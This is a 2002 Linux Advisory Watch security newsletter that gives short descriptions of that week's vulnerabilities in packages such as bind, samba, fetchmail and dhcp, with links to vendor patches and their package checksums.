+----------------------------------------------------------------+ | LinuxSecurity.com Linux Advisory Watch | | November 22nd, 2002 Volume 3, Number 47a | +----------------------------------------------------------------+ Editors: Dave Wreski Benjamin Thomas dave@linuxsecurity.com ben@linuxsecurity.com Linux Advisory Watch is a comprehensive newsletter that outlines the security vulnerabilitiaes that have been announced throughout the week. It includes pointers to updated packages and descriptions of each vulnerability. This week, advisories were released for squid, wwoffled, lynx, tcpdump, fetchmail, courier, KDE SSL, nullmailer, mhonarc, smrsh, bind, ypserv, getbyname, ftpd, Red Hat kernel, samba, windowmaker, dhcp, php, and gtetrinet. The distributors include Caldera, Debian, FreeBSD, Gentoo, Mandrake, NetBSD, OpenPKG, Red Hat, SuSE, and Trustix. Concerned about the next threat? EnGarde is the undisputed winner! Hardened Linux Puts Hackers EnGarde! Winner of the Network Computing Editor's Choice Award, EnGarde "walked away with our Editor's Choice award thanks to the depth of its security strategy..." Find out what the other Linux vendors are not telling you. http://ads.linuxsecurity.com/cgi-bin/ad_redirect.pl?id=engarde2 Security: MySQL and PHP (3 of 3) - This is the third installation of a 3 part article on LAMP (Linux Apache MySQL PHP). In order to safeguard a MySQL server to the basic level, one has to abide by the following guidelines. http://www.linuxsecurity.com/feature_stories/feature_story-130.html FEATURE: Security: Physical and Service (1 of 3) - The first installation of a 3 part article covering everything from physical security and service security to LAMP security (Linux Apache MySQL PHP). http://www.linuxsecurity.com/feature_stories/feature_story-128.html +---------------------------------+ | Package: squid | ----------------------------// | Date: 11-14-2002 | +---------------------------------+ Description: Several bugfixes and cleanup of the Gopher client, both to correct some security issues and to make Squid properly render certain Gopher menus. Security fixes in how Squid parses FTP directory listings into HTML. FTP data channels are now sanity checked to match the address of the requested FTP server. This to prevent theft or injection of data. Vendor Alerts: Caldera: ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/ Server/CSSA-2002-046.0/RPMS squid-2.5-20020429.i386.rpm fdda342fe954cf6ea304046781a555c8 Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2574.html +---------------------------------+ | Package: KDE SSL | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: Konqueror's cross site scripting (XSS) protection fails to initialize the domains on sub-(i)frames correctly. As a result, Javascript can access any foreign subframe which is defined in the HTML source. KDE's SSL implementation fails to check the basic constraints on certificates and as a result may accept certificates as valid that were signed by an issuer who was not authorized to do so. Vendor Alerts: Caldera: PLEASE SEE VENDOR ADVISORY FOR UPDATE Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2579.html +---------------------------------+ | Package: wwoffled | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: wwwoffled allows remote attackers to cause a denial of service and possibly execute arbitrary code via a negative Content-Length value. Vendor Alerts: Caldera: ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/ Workstation/CSSA-2002-048.0/RPMS wwwoffle-2.6b-3MR.i386.rpm d54de95d9db4d19501e6b50ef63f2e31 Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2586.html +---------------------------------+ | Package: lynx | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: If lynx is given a url with some special characters on the command line, it will include faked headers in the HTTP query. This feature can be used to force scripts (that use Lynx for downloading files) to access the wrong site on a web server with multiple virtual hosts. Vendor Alerts: Caldera: ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/ Server/CSSA-2002-049.0/RPMS lynx-2.8.4-1.i386.rpm 86aa0c385c7b4789aa33fe57dc209490 Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2587.html +---------------------------------+ | Package: tcpdump | ----------------------------// | Date: 11-19-2002 | +---------------------------------+ Description: There is a miscalculation in the use of the sizeof operator in tcpdump, allowing, at the least, a denial-of-service attack. Vendor Alerts: Caldera: ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/ Server/CSSA-2002-050.0/RPMS tcpdump-3.6.2-4.i386.rpm 88099679d803eb7f1583f99ccaa68fed Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2594.html +---------------------------------+ | Package: fetchmail | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: Several buffer overflows have been found in fetchmail. These bugs may be remotely exploited if fetchmail is running in multidrop mode. Vendor Alerts: Caldera: ftp://ftp.sco.com/pub/updates/OpenLinux/3.1.1/ Server/CSSA-2002-051.0/RPMS fetchmail-6.1.0-3.i386.rpm 434fea1951a0d2f3b84aacef99c64406 fetchmailconf-6.1.0-3.i386.rpm f4a95f399c696a47d30cb42076a16537 Caldera Vendor Advisory: http://www.linuxsecurity.com/advisories/caldera_advisory-2599.html +---------------------------------+ | Package: courier | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: A problem in the Courier sqwebmail package, a CGI program to grant authenticated access to local mailboxes, has been discovered. The program did not drop permissions fast enough upon startup under certain circumstances so a local shell user can execute the sqwebmail binary and manage to read an arbitrary file on the local filesystem. Vendor Alerts: Debian: PLEASE SEE VENDOR ADVISORY FOR UPDATE Debian Vendor Advisory: http://www.linuxsecurity.com/advisories/debian_advisory-2577.html Gentoo: Gentoo Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2588.html +---------------------------------+ | Package: nullmailer | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: A problem has been discovered in nullmailer, a simple relay-only mail transport agent for hosts that relay mail to a fixed set of smart relays. When a mail is to be delivered locally to a user that doesn't exist, nullmailer tries to deliver it, discovers a user unknown error and stops delivering. Unfortunately, it stops delivering entirely, not only this mail. Hence, it's very easy to craft a denial of service. Vendor Alerts: Debian: http://security.debian.org/pool/updates/main/n/nullmailer/ nullmailer_1.00RC5-16.1woody2_ia64.deb Size/MD5 checksum: 144246 c508c104d7b775e84641aabdc2adf209 Debian Vendor Advisory: http://www.linuxsecurity.com/advisories/debian_advisory-2584.html +---------------------------------+ | Package: mhonarc | ----------------------------// | Date: 11-19-2002 | +---------------------------------+ Description: Steven Christey discovered a cross site scripting vulnerability in mhonarc, a mail to HTML converter. Carefully crafted message headers can introduce cross site scripting when mhonarc is configured to display all headers lines on the web. However, it is often useful to restrict the displayed header lines to To, From and Subject, in which case the vulnerability cannot be exploited. Vendor Alerts: Debian: http://security.debian.org/pool/updates/main/m/ mhonarc/mhonarc_2.4.4-1.2_all.deb Size/MD5 checksum: 453352 8e7f1a40ff78e0bef2d1c9593545baee Debian Vendor Advisory: http://www.linuxsecurity.com/advisories/debian_advisory-2589.html +---------------------------------+ | Package: smrsh | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: Users with a local account and the ability to create or modify their `.forward' files can circumvent the smrsh restrictions. This is mostly of consequence to systems which have local users that are not normally allowed access to a login shell, as such users may abuse this bug in order to execute arbitrary commands with normal privileges. Vendor Alerts: FreeBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE FreeBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/freebsd_advisory-2575.html +---------------------------------+ | Package: bind | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: BIND SIG Cached RR Overflow Vulnerability: A remote attacker may be able to cause a name server with recursion enabled to execute arbitrary code with the privileges of the name server process. BIND OPT DoS and BIND SIG Expiry Time DoS: A remote attacker may be able to cause the name server process to crash. Vendor Alerts: FreeBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE FreeBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/freebsd_advisory-2576.html NetBSD: NetBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/netbsd_advisory-2591.html OpenPKG: OpenPKG Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2580.html Trustix: Trustix Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2581.html +---------------------------------+ | Package: ypserv | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: A memory leak that could be triggered remotely was discovered in ypserv 2.5 and earlier. This could lead to a Denial of Service as repeated requests for a non-existant map will result in ypserv consuming more and more memory, and also running more slowly. If the system runs out of available memory, ypserv would also be killed. Vendor Alerts: Mandrake: http://www.mandrakesecure.net/en/ftp.php 9.0/RPMS/ypserv-2.5-1.1mdk.i586.rpm d422a834b1869149b38bf1c8a1e8a4d6 Mandrake Vendor Advisory: http://www.linuxsecurity.com/advisories/mandrake_advisory-2590.html +---------------------------------+ | Package: getbyname | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: getnetbyname(3) and getnetbyaddr(3) lacked important boundary checks, and are vulnerable to malicious DNS responses, which could cause a buffer overrun on the stack. The vulnerability could cause a remote root compromise, if a privileged process uses these library functions. Vendor Alerts: NetBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE NetBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/netbsd_advisory-2592.html +---------------------------------+ | Package: ftpd | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: NetBSD's ftpd responds to the STAT command in a way that is not standards conformant, when a filename that contains "\n[0-9]" is specified. This could be used by a malicious party to corrupt state tables in firewall devices between an FTP client and a NetBSD FTP server. Vendor Alerts: NetBSD: PLEASE SEE VENDOR ADVISORY FOR UPDATE NetBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/netbsd_advisory-2593.html +---------------------------------+ | Package: Red Hat kernel | ----------------------------// | Date: 11-15-2002 | +---------------------------------+ Description: The kernel in Red Hat Linux 7.1, 7.1K, 7.2, 7.3, and 8.0 are vulnerable to a local denial of service attack. Updated packages are available which address this vulnerability, as well as bugs in several drivers. Vendor Alerts: Red Hat: PLEASE SEE VENDOR ADVISORY FOR UPDATE NetBSD Vendor Advisory: http://www.linuxsecurity.com/advisories/redhat_advisory-2578.html Trustix: Trustix Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2582.html +---------------------------------+ | Package: samba | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: The error consists of a buffer overflow in a commonly used routine that accepts user input and may write up to 127 bytes past the end of the buffer allocated with static length, leaving enough room for an exploit. The resulting vulnerability can be exploited locally in applications using the sm_smbpass Pluggable Authentication Module (PAM). It may be possible to exploit this vulnerability remotely, causing the running smbd to crash or even to execute arbitrary code. Vendor Alerts: SuSE: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/ samba-2.2.5-124.i586.rpm f0a94ef6cc49165d4dace59caaf359d7 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/ samba-client-2.2.5-124.i586.rpm f694fb4aaabffa98b6a76941cb2c0eaf SuSE Vendor Advisory: http://www.linuxsecurity.com/advisories/suse_advisory-2598.html Gentoo: Gentoo Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2597.html +---------------------------------+ | Package: windowmaker | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: A possible scenario for this vulnerability could be that of an attacker making a specially crafted image available and convincing an unsuspecting user to set it as a background image. Vendor Alerts: Conectiva: PLEASE SEE VENDOR ADVISORY FOR UPDATE Conectiva Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2583.html +---------------------------------+ | Package: dhcp | ----------------------------// | Date: 11-18-2002 | +---------------------------------+ Description: Simon Kelley pointed out a vulnerability in the way quotes inside these assignments are treated. By exploiting this, a malicious DHCP server (or attackers able to spoof DHCP responses) can execute arbitrary shell commands on the DHCP client (which is run by root). Vendor Alerts: Conectiva: ftp://atualizacoes.conectiva.com.br/8/RPMS/ dhcpcd-1.3.22pl3-1U80_1cl.i386.rpm Conectiva Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2585.html +---------------------------------+ | Package: php | ----------------------------// | Date: 11-20-2002 | +---------------------------------+ Description: Two vulnerabilities exists in mail() PHP function. The first one allows to execute any program/script bypassing safe_mode restriction, the second one may give an open-relay script if mail() function is not carefully used in PHP scripts. Vendor Alerts: Gentoo: PLEASE SEE VENDOR ADVISORY FOR UPDATE Gentoo Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2595.html +---------------------------------+ | Package: gtetrinet | ----------------------------// | Date: 11-20-2002 | +---------------------------------+ Description: Several buffer overflows was found in gtetrinet versions below 0.4.3. According to the authors these could be remotley explotied. Vendor Alerts: Gentoo: PLEASE SEE VENDOR ADVISORY FOR UPDATE Gentoo Vendor Advisory: http://www.linuxsecurity.com/advisories/other_advisory-2595.html ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------